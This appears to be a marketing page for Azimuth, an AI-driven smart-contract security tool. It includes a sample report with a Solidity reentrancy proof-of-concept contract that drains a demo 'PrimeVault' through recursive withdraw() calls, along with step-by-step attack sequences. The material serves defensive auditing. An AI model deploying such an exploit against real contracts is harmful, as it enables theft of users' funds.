Automated Security Analysis

AI Agents That Actively Attack Your Smart Contracts

Azimuth — Automated Security Analysis

Azimuth deploys AI agents — powered by Lodestar, our reinforcement learning engine — that actively attack your smart contracts. Running against forked mainnet environments with real transaction execution, Azimuth probes every function, chains multi-step attacks, and proves exploits end-to-end. If Azimuth reports a vulnerability, it was actually exploited — not just theoretically possible.

AI agents · Zero false positives · Working PoC for every finding · CI/CD integration
app.testmachine.ai/azimuth/report/primevault
Security Analysis — testmachine-ai/PrimeVault
✓ Completed
Investigated: 0
Confirmed: 0
False Positives: 0
Analysis Time
100% signal · 0 false positives
4.8M tokens · $0.05 total cost
Findings: Critical 1 · Low 1
Critical: Reentrancy in withdraw() enables fund drainage (✓ Confirmed)
The withdraw() function sends ETH to the caller before updating internal accounting state. An attacker can deploy a malicious contract that re-enters withdraw() during the ETH transfer, draining the vault in a single transaction.
Attack Sequence
1. Attacker deposits minimum stake into PrimeVault
2. Attacker calls withdraw() from malicious contract
3. PrimeVault sends ETH via call{value:}
4. Attacker's receive() re-enters withdraw()
5. State not yet updated — full balance available again
6. Loop repeats until vault is drained
Proof of Concept
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "./PrimeVault.sol";

contract ReentrancyExploit {
    PrimeVault public vault;
    uint256 public attackCount;

    constructor(address _vault) {
        vault = PrimeVault(_vault);
    }

    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdraw();
    }

    receive() external payable {
        if (attackCount < 10) {
            attackCount++;
            vault.withdraw();
        }
    }
}
Low: Arithmetic overflow in pendingReward calculation (✓ Confirmed)
The pendingReward() function can overflow when computing accumulated rewards for accounts with very large staking durations combined with high reward rates. Results in denial of service for affected accounts — rewards become unclaimable.

Submit. Fork. Attack. Report.

01 Submit

Point Azimuth at any contract address or GitHub repo. Works with deployed contracts or pre-deployment code.

02 Fork & Attack

Azimuth forks live mainnet state and deploys RL agents powered by Lodestar. Agents chain multi-step attacks, probing every function and state transition.

03 Report

Every finding includes a working proof-of-concept exploit. Zero false positives — if Azimuth reports it, it was actually exploited.

Behavioral vulnerabilities that static analysis misses

Azimuth discovers exploit paths through execution, not pattern matching. These vulnerability classes require understanding contract state across sequences of transactions — exactly what LLMs and static analyzers cannot do.

Reentrancy

Detects recursive call exploits across single and cross-function patterns, including read-only reentrancy.

Flash Loan Attacks

Discovers multi-step flash loan sequences that manipulate prices, drain pools, or exploit composability gaps.

Access Control

Finds privilege escalation paths, unprotected admin functions, and misconfigured role hierarchies.

Oracle Manipulation

Identifies price feed exploits, TWAP manipulation windows, and stale oracle dependencies.

Economic Logic Flaws

Uncovers broken incentive structures, sandwich attack vectors, and arbitrage-exploitable pricing curves.

Governance Attacks

Tests voting manipulation, quorum exploitation, timelock bypasses, and proposal hijacking scenarios.

Minutes, not months

Azimuth is not a replacement for human auditors — it is a continuous security layer that catches what point-in-time audits cannot.

|  | Traditional Audit | Azimuth |
| --- | --- | --- |
| Time to results | 4–8 weeks | Minutes |
| Cost | $50K–$500K | Fraction of traditional audit cost |
| False positives | Common — findings require manual triage | Zero — every finding is a proven exploit |
| Output | PDF report with recommendations | Working PoC exploit code for every finding |
| Coverage | Point-in-time snapshot | Continuous re-analysis as contracts change |
| Scalability | One project per engagement | Thousands of contracts per day |

Security at every stage

From first commit to production monitoring, Azimuth fits into your existing workflow.

Pre-Deployment

Run Azimuth before deploying to mainnet. Catch exploitable vulnerabilities while fixes are still cheap.

CI/CD Pipeline

Integrate via GitHub Actions or CLI. Every pull request automatically tested for security regressions.

Continuous Monitoring

Post-deployment, Azimuth continuously re-analyzes as proxy contracts upgrade and external dependencies change.

Due Diligence

Exchanges, VCs, and protocols use Azimuth to evaluate token and protocol risk before listing or investing.

Powered by Lodestar

Lodestar is TestMachine's proprietary reinforcement learning engine. Unlike LLMs that pattern-match against known vulnerability templates, Lodestar agents learn by doing — interacting with smart contracts through thousands of transaction sequences, receiving reward signals when exploits succeed, and adapting their strategies to each contract's unique logic.

Learns from every interaction — agents improve as they explore more contracts
State-aware — tracks the full contract state across multi-step attack sequences
Novel vulnerability discovery — finds exploits that have never been documented
Adversarial by design — attacks contracts the way a real attacker would

Every major EVM chain

One engine. Full coverage. Every chain analyzed with the same depth and rigor.

Ethereum
Base
Arbitrum
Optimism
Polygon
Avalanche
BNB Chain

Secure your protocol today

RL-powered security analysis with zero false positives. Every finding includes a working proof-of-concept exploit.
